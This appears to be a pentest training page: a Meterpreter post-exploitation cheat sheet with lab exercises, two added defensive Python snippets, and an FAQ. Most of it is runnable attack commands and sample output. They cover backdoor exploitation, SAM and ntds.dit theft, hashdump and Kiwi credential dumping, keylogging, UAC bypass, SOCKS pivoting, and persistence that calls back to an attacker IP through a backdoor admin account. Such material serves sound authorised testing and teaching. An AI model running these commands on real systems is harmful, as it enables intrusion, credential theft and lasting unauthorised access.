Meterpreter Commands Cheat Sheet 2026 — 50+ Commands With Real Examples

You've landed a shell. Now what? Most guides stop at getting Meterpreter to connect back. The real work, the part that determines whether a penetration test produces actionable findings, is what happens after: system recon that maps the complete environment, credential harvesting that demonstrates actual account compromise, network pivoting that shows the internal attack paths, and persistence that proves an attacker could maintain access. This Meterpreter cheat sheet covers every command you need for the complete Meterpreter post-exploitation workflow, with real examples for every stage.

🎯 What This Meterpreter Cheat Sheet Covers

Core commands — session management, help, shell, background
System recon — sysinfo, getuid, ps, getsystem, hashdump
File operations — upload, download, search, cat, edit
Privilege escalation — getsystem, migrate, local_exploit_suggester
Persistence — run persistence, scheduled tasks, registry run keys
Network pivoting — route, portfwd, socks proxy

⏱️ Reference guide · Bookmark and use on every engagement


Core and Session Commands

These are the commands that control the Meterpreter session itself — backgrounding, interacting with multiple sessions, dropping to a standard shell, and getting help on any command. Every post-exploitation workflow starts here.

CORE METERPRETER COMMANDS
# Get help — list all available commands
help
help [command]
# Background the current session (returns to msfconsole)
background
bg
# List all active sessions
sessions -l
# Interact with a specific session
sessions -i 1
# Drop to a standard OS shell
shell
# Return to Meterpreter from shell: Ctrl+C or 'exit'
# Execute a single command and return output
execute -f cmd.exe -a "/c whoami" -H -i
# Kill the session and remove the payload
exit
exit -y


System Reconnaissance

System recon maps the target environment — OS version, current user privileges, running processes, network configuration, and logged-in users. This information feeds directly into privilege escalation decisions and lateral movement planning. Run these commands first on every new Meterpreter session before anything else.

SYSTEM RECON COMMANDS
# System information — OS, hostname, architecture, language
sysinfo
Computer : WIN-SERVER2022
OS : Windows Server 2022 (10.0 Build 20348)
Architecture : x64
# Current user context
getuid
Server username: DOMAIN\jsmith
# Current process ID and name
getpid
Current pid: 2456
# List all running processes
ps
PID   PPID  Name          Arch  Session  User
4     0     System        x64   0        NT AUTHORITY\SYSTEM
768   500   services.exe  x64   0        NT AUTHORITY\SYSTEM
2456  1234  chrome.exe    x64   1        DOMAIN\jsmith
# Network interfaces and routing
ifconfig
ipconfig
arp
route
# Environment variables
env
# Logged-in users
run post/windows/gather/enum_logged_on_users
# Check if we’re in a VM or sandbox
run post/multi/gather/vmware_detection
run post/windows/gather/checkvm

Meterpreter: First 5 Commands on Every New Session
sysinfo: OS version, hostname, architecture; determines which exploits apply
getuid: Current user context; is it admin/SYSTEM already or not?
ps: Running processes; identify SYSTEM processes for migration targets
ifconfig: Network interfaces; discover internal subnets for pivoting
getpid: Current process; assess stability, plan migration if needed

📸 The first five Meterpreter commands on every new session. Running these immediately after getting a shell establishes the baseline: what OS, who are we, what privileges, what network access. The answers to these five commands determine every subsequent action — whether to escalate, what processes to target for migration, and which internal networks can be reached for pivoting.

⚡ EXERCISE 1 — KALI TERMINAL (15 MIN)
Open Meterpreter on a Metasploitable VM and Run Full System Recon

⏱️ 15 minutes · Kali + Metasploitable2 lab · Your own VMs only

EXERCISE 1 — METERPRETER SYSTEM RECON
# Step 1: Get a Meterpreter session on Metasploitable2
msfconsole -q
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.x.x
set PAYLOAD cmd/unix/interact
run
# OR use a different module that gives Meterpreter on your lab target
# Step 2: Run the first-5 commands
sysinfo
getuid
getpid
ps
ifconfig
# Step 3: Extended recon
arp
netstat
env
# Step 4: Note what internal subnets you can see in ifconfig
# These are the networks you can pivot into

✅ What you just learned: The first-5 commands establish the complete post-exploitation baseline in under 60 seconds. The ifconfig output is particularly important — any network interface beyond the one you connected through reveals an internal network the target has access to. That’s your pivoting target. The ps list shows which processes are running as SYSTEM — migrating into one of those is the path to privilege escalation without running any exploit.

📸 Screenshot the sysinfo and ifconfig output. Post to #day-19-hashcat or #meterpreter on Discord.


File Operations

Meterpreter’s file operations run entirely in memory — uploads and downloads go through the encrypted channel without touching the file system in obvious ways. The search command can locate sensitive files across the entire filesystem efficiently. These commands support the evidence-gathering phase of a penetration test: finding configuration files, extracting credentials from known locations, and transferring tools to and from the target.

FILE OPERATION COMMANDS
# Print working directory
pwd
getwd
# List directory contents
ls
dir
# Change directory
cd "C:\\Users\\Administrator\\Documents"
# Read file contents
cat "C:\\Windows\\System32\\drivers\\etc\\hosts"
# Search for files by name or extension
search -f "*.config" -d "C:\\inetpub"
search -f "web.config"
search -f "id_rsa" -d "/home"
# Search for KeePass databases
search -f "*.kdbx"
# Upload file to target
upload /opt/tools/winpeas.exe "C:\\Temp\\winpeas.exe"
# Download file from target
download "C:\\Windows\\System32\\config\\SAM" /tmp/SAM
download "C:\\Users\\Administrator\\NTDS\\ntds.dit" /tmp/ntds.dit
# Delete file
rm "C:\\Temp\\tool.exe"
# Edit file in local editor (downloads, edits locally, re-uploads)
edit "C:\\Temp\\config.xml"


Privilege Escalation Commands

Privilege escalation in Meterpreter uses three main approaches: getsystem (automated multi-technique escalation), process migration (moving to an already-privileged process), and the local_exploit_suggester module (identifying unpatched local vulnerabilities). Always run getsystem first — it works surprisingly often on misconfigured Windows environments. If getsystem fails, run local_exploit_suggester to identify specific vulnerabilities to exploit.

PRIVILEGE ESCALATION COMMANDS
# Attempt automatic privilege escalation (tries multiple techniques)
getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin))
# Check if escalation worked
getuid
Server username: NT AUTHORITY\SYSTEM
# Identify local privilege escalation vulnerabilities
run post/multi/recon/local_exploit_suggester
[+] 192.168.1.100 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable
[+] 192.168.1.100 - exploit/windows/local/ms16_032_secondary_logon: The target appears to be vulnerable
# Process migration — move to a SYSTEM process
# First identify a SYSTEM process from 'ps' output
migrate 4
[*] Migrating from 2456 to 4...
[*] Migration completed successfully.
# Migrate by process name (more reliable than PID)
migrate -N lsass.exe
migrate -N winlogon.exe
# Bypass UAC (Windows 10/11 with standard user)
run post/windows/manage/bypassuac_injection
use exploit/windows/local/bypassuac_sluihijack


Credential Harvesting

Credential harvesting is the high-value output of post-exploitation — the evidence that proves actual account compromise in a penetration test report. Meterpreter’s hashdump provides NTLM hashes directly from the Windows SAM database. Kiwi (the Meterpreter Mimikatz integration) extracts cleartext passwords and Kerberos tickets from LSASS memory. Both require SYSTEM privileges.

CREDENTIAL HARVESTING COMMANDS
# Dump local SAM hashes (requires SYSTEM)
hashdump
Administrator:500:aad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# Load Kiwi (Mimikatz in Meterpreter)
load kiwi
# Dump all credentials (cleartext where available)
creds_all
# Specifically dump WDIGEST plaintext passwords
creds_wdigest
# Dump NTLM hashes via kiwi
creds_msv
# Extract Kerberos tickets
kerberos_ticket_list
kerberos_ticket_dump
# Keylogger (capture keystrokes)
keyscan_start
keyscan_dump
keyscan_stop
# Screenshot
screenshot

⚡ EXERCISE 2 — KALI TERMINAL (15 MIN)
Privilege Escalation and Credential Harvesting on Lab VM

⏱️ 15 minutes · Kali + Windows lab VM · Your own VMs only

EXERCISE 2 — PRIVESC AND HASHDUMP
# Assuming you have a Meterpreter session from Exercise 1
# Step 1: Check current privileges
getuid
getprivs
# Step 2: Attempt getsystem
getsystem
getuid
# Confirm SYSTEM if successful
# Step 3: Run exploit suggester
bg
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
# Step 4: Extract credentials
sessions -i 1
hashdump
load kiwi
creds_all
# Step 5: Save hashes for Hashcat (Day 19)
hashdump > /tmp/lab_hashes.txt
# Now crack with: hashcat -m 1000 /tmp/lab_hashes.txt rockyou.txt

✅ What you just learned: The getsystem → getuid → hashdump chain is the core privilege escalation and credential harvest sequence in Windows post-exploitation. The local_exploit_suggester output gives you specific CVEs to follow up with if getsystem fails. The hashes from hashdump feed directly into Hashcat (Day 19) — the complete chain from foothold to cracked passwords runs across Days 17–19 tools.

📸 Screenshot the hashdump output (blur sensitive data). Post to #meterpreter on Discord.
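
Instead of blurring hashdump output by hand, it can be redacted before it goes into a screenshot or report. The following is an added example, not part of the original cheat sheet or of Metasploit: it parses the `user:rid:lm:nt:::` format shown above, replaces each NT hash with a keyed tag that still reveals reuse, and flags blank passwords. The function name, field names and sample lines are constructed for illustration.

```python
import hashlib
import hmac
import secrets

# Well-known NT hash of the empty password.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
HEX = set("0123456789abcdef")


def redact_hashdump(text, key=None):
    """Parse pwdump-style lines (user:rid:lm:nt:::) into report-safe rows.

    Each NT hash is replaced by a short keyed HMAC tag. Equal hashes still
    produce equal tags, so password reuse stays visible, but the tag cannot
    be fed to a cracker or replayed.
    """
    key = key or secrets.token_bytes(32)      # throwaway key, never stored
    rows = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue                          # prompts, banners, blank lines
        user, rid, nt = parts[0], int(parts[1]), parts[3].lower()
        if len(nt) != 32 or not set(nt) <= HEX:
            continue                          # not a well-formed NT hash
        tag = hmac.new(key, nt.encode(), hashlib.sha256).hexdigest()[:8]
        rows.append({"user": user, "rid": rid, "nt_tag": tag,
                     "blank_password": nt == EMPTY_NT})
    # Flag accounts that share a non-blank NT hash with another account.
    seen = {}
    for row in rows:
        seen[row["nt_tag"]] = seen.get(row["nt_tag"], 0) + 1
    for row in rows:
        row["shared_hash"] = seen[row["nt_tag"]] > 1 and not row["blank_password"]
    return rows


# Constructed sample, not from a real system; the non-empty NT value is made up.
SAMPLE = """\
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""

if __name__ == "__main__":
    for row in redact_hashdump(SAMPLE):
        print(row)
```
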


Network Pivoting and Port Forwarding

Pivoting turns a single compromised host into a gateway to internal networks. When ifconfig reveals additional network interfaces — private subnets the external attacker cannot reach directly — Meterpreter’s routing and proxy modules allow all tools on Kali to reach those internal networks through the compromised host.

PIVOTING AND PORT FORWARDING
# Add a route through the current session to an internal subnet
route add 10.10.10.0/24 1
route print
# Create a SOCKS proxy through the session
bg
use auxiliary/server/socks_proxy
set SRVPORT 1080
set VERSION 5
run -j
# Now route all tools through proxychains
proxychains nmap -sT -Pn 10.10.10.0/24
# Port forwarding — forward local port to remote service
portfwd add -l 3389 -p 3389 -r 10.10.10.5
# Now: rdesktop 127.0.0.1:3389 connects to 10.10.10.5:3389
# List port forwards
portfwd list
# Delete a port forward
portfwd delete -l 3389


Persistence Mechanisms

Persistence ensures the Meterpreter session survives a reboot and reconnects automatically. In authorised penetration testing, persistence demonstrates that an attacker could maintain long-term access after initial compromise. Always document what persistence mechanisms you install and remove them cleanly before completing the engagement.

PERSISTENCE COMMANDS
# Built-in persistence module (Windows)
run persistence -h
run persistence -X -i 30 -p 4444 -r [attacker_IP]
# -X = autostart at boot, -i 30 = retry every 30s
# Post module persistence (more stealthy)
run post/windows/manage/persistence_exe STARTUP=SCHEDULER
# Add registry run key
run post/windows/manage/persistence STARTUP=REGISTRY
# Create new user (last resort, highly visible)
run post/windows/manage/add_user_to_group USERNAME=backdoor GROUP=Administrators
# CLEANUP — always remove persistence after engagement
run multi_console_command -rc /root/.msf4/logs/persistence/cleanup.rc

⚡ EXERCISE 3 — KALI TERMINAL (15 MIN)
Set Up Pivoting to an Internal Network in Your Lab

⏱️ 15 minutes · Kali + multi-VM lab

EXERCISE 3 — ROUTE AND SOCKS PROXY
# Assuming Meterpreter session on a VM with 2 network interfaces
# Interface 1: 192.168.1.x (your Kali network)
# Interface 2: 10.0.0.x (internal network Kali can’t reach)
# Step 1: Confirm internal interface in Meterpreter
ifconfig
# Note the internal 10.0.0.x subnet
# Step 2: Background and add route
bg
route add 10.0.0.0/24 1
route print
# Step 3: Start SOCKS proxy
use auxiliary/server/socks_proxy
set SRVPORT 1080
run -j
# Step 4: Configure proxychains
echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf
# Step 5: Scan internal network via pivot
proxychains nmap -sT -Pn -p 22,80,443,3389 10.0.0.0/24 2>/dev/null
# Internal hosts now visible via the compromised pivot

✅ What you just learned: The route + SOCKS proxy combination turns the compromised host into a transparent gateway to internal networks. Any tool that supports proxychains can now reach the internal 10.0.0.x network as if Kali were directly connected. This is how penetration testers demonstrate lateral movement potential: “from this one compromised host, I can reach the internal HR, finance, and domain controller subnets.” The pivoting evidence is often the most impactful finding in a network penetration test.

📸 Screenshot the proxychains nmap output showing internal hosts discovered via pivot. Post to #meterpreter on Discord. Tag #day11complete

Always Clean Up After Persistence: Every persistence mechanism you install — registry keys, scheduled tasks, services, new user accounts — must be documented and removed at the end of the engagement. The Metasploit persistence modules create a cleanup script at /root/.msf4/logs/persistence/. Run it before leaving. Leaving persistence behind in client environments is one of the most serious mistakes a penetration tester can make and often results in contract termination.
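
Each mechanism named above (registry run key, scheduled task, new user, group membership) leaves a standard Windows audit event, so what was installed can be reconciled against what was documented before sign-off. This is an added example, not code from the original page or from Metasploit. It assumes the events were already exported to dicts with Windows event field names and that Sysmon registry logging and the relevant audit policies are enabled; all sample events and artifact names are constructed.

```python
# Events left by the persistence styles on this page: Sysmon 13 (registry
# value set), Security 4698 (scheduled task created), 4720 (user account
# created), 4732 (member added to a security-enabled local group).
RUN_KEY = "\\microsoft\\windows\\currentversion\\run"
ADMINS_SID = "S-1-5-32-544"        # well-known SID of BUILTIN\Administrators


def artifact(event):
    """Return (kind, name) if the event records a persistence artifact."""
    source, eid = event.get("source"), event.get("id")
    if source == "Sysmon" and eid == 13:
        target = event.get("TargetObject", "")
        if RUN_KEY in target.lower():          # also matches ...\RunOnce
            return ("registry-run-key", target)
    elif source == "Security":
        if eid == 4698:
            return ("scheduled-task", event.get("TaskName", ""))
        if eid == 4720:
            return ("user-created", event.get("TargetUserName", ""))
        if eid == 4732 and event.get("TargetSid") == ADMINS_SID:
            return ("added-to-administrators", event.get("MemberSid", ""))
    return None


def reconcile(events, documented):
    """Split detected artifacts into documented and unexplained lists."""
    known, unexplained = [], []
    for event in events:
        hit = artifact(event)
        if hit is not None:
            (known if hit in documented else unexplained).append(hit)
    return known, unexplained


# Constructed sample events; field names follow the Windows event schema.
MEMBER = "S-1-5-21-1111111111-2222222222-3333333333-1005"
RUN_VALUE = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\labagent"
EVENTS = [
    {"source": "Sysmon", "id": 13, "TargetObject": RUN_VALUE},
    {"source": "Sysmon", "id": 13, "TargetObject": r"HKLM\SOFTWARE\Example\Theme"},
    {"source": "Security", "id": 4698, "TaskName": r"\LabUpdater"},
    {"source": "Security", "id": 4720, "TargetUserName": "backdoor"},
    {"source": "Security", "id": 4732, "TargetSid": ADMINS_SID, "MemberSid": MEMBER},
    {"source": "Security", "id": 4624, "TargetUserName": "jsmith"},
]
# Artifacts the tester recorded during the engagement (constructed).
DOCUMENTED = {("registry-run-key", RUN_VALUE), ("user-created", "backdoor"),
              ("added-to-administrators", MEMBER)}

if __name__ == "__main__":
    known, unexplained = reconcile(EVENTS, DOCUMENTED)
    print("documented:", known)
    print("unexplained:", unexplained)
```

Anything in the unexplained list is either an undocumented test artifact that still needs removal or persistence that did not come from the engagement at all.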

🧠 QUICK CHECK — Meterpreter

You have a Meterpreter session running as a low-privilege domain user. getsystem fails. ps shows that services.exe (PID 768) is running as NT AUTHORITY\SYSTEM. What is the most direct next step to attempt privilege escalation?



📋 Meterpreter Quick Reference — Complete Command List

sysinfo / getuid / getpid / ps / ifconfig: First 5 commands on every new session — establish baseline context
getsystem → getuid: Attempt automatic privilege escalation → confirm SYSTEM
migrate [PID] / migrate -N [name]: Move session into a privileged process by PID or name
hashdump / load kiwi / creds_all: Credential harvesting — SAM hashes + cleartext passwords from LSASS
route add [subnet] [session] → socks_proxy: Pivot to internal networks via the compromised host
portfwd add -l [local] -p [remote] -r [IP]: Forward local port to remote service via the session

The complete Meterpreter post-exploitation command reference. Bookmark this page — every command you need for a Windows post-exploitation engagement is here with real examples.


❓ Frequently Asked Questions — Meterpreter 2026

What is Meterpreter?
Metasploit’s advanced post-exploitation payload. Runs entirely in memory (no disk files), communicates over encrypted channels, and provides built-in modules for system recon, file operations, privilege escalation, persistence, credential harvesting, and network pivoting.
How do you get a Meterpreter shell?
Generate payload with msfvenom, set up a handler (use exploit/multi/handler), deliver the payload via your attack vector, wait for the callback. The payload connects back to your handler and opens the Meterpreter session.
What is the difference between shell and Meterpreter?
A shell is a basic command interface. Meterpreter provides an advanced payload with built-in post-exploitation commands, runs in memory without disk artifacts, uses encrypted communication, and offers modules for every phase of post-exploitation.
How do you escalate privileges with Meterpreter?
Try getsystem first (multiple automatic techniques). If it fails: check ps for SYSTEM processes and migrate; run local_exploit_suggester to find specific CVEs; use bypassuac modules if applicable. Check with getuid after each attempt.
How do you pivot through a network with Meterpreter?
route add [subnet] [session_id] adds a route through the session. Then use auxiliary/server/socks_proxy to create a SOCKS proxy. Configure proxychains to use 127.0.0.1:1080, and any tool run through proxychains can reach the internal network.
How do you clean up Meterpreter persistence?
The persistence modules create a cleanup script at /root/.msf4/logs/persistence/. Run it with: run multi_console_command -rc [cleanup_file]. Document all installed persistence and verify removal before completing any engagement.
Mr Elite
Owner, SecurityElites.com
The command that changes every engagement is the one that reveals an unexpected second network interface in ifconfig. You’ve been thinking about the one host you’re on. Suddenly you can see an internal subnet that isn’t in the original scope diagram. The pivot transforms what was a single-host finding into a demonstration of network-wide compromise. That’s the moment the client’s security team realises that the DMZ being “separate” from the internal network was an assumption, not a verified fact. Adding the route, starting the SOCKS proxy, running proxychains nmap — three commands that rewrite the entire engagement narrative.
